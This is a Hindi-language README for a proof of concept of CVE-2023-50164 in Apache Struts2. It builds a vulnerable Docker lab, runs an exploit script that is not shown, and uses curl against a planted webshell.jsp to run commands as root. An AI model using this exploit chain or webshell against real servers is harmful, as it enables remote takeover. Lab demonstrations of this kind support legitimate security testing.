
CVE-2023-50164 (Apache Struts पाथ ट्रैवर्सल से RCE भेद्यता) - प्रूफ ऑफ कॉन्सेप्ट
यह PoC Apache Struts2 भेद्यता का शोषण करके RCE (रिमोट कोड एक्ज़ीक्यूशन) का परीक्षण करने के लिए बनाया गया है।

इमेज बनाएं और एक कंटेनर चलाएं:
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
एक्सप्लॉइट चलाएं:
$ cd exploit
$ ./exploit.sh
अब आप सर्वर साइड पर मनमाने कमांड निष्पादित कर सकते हैं जैसा कि दिखाया गया है:
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)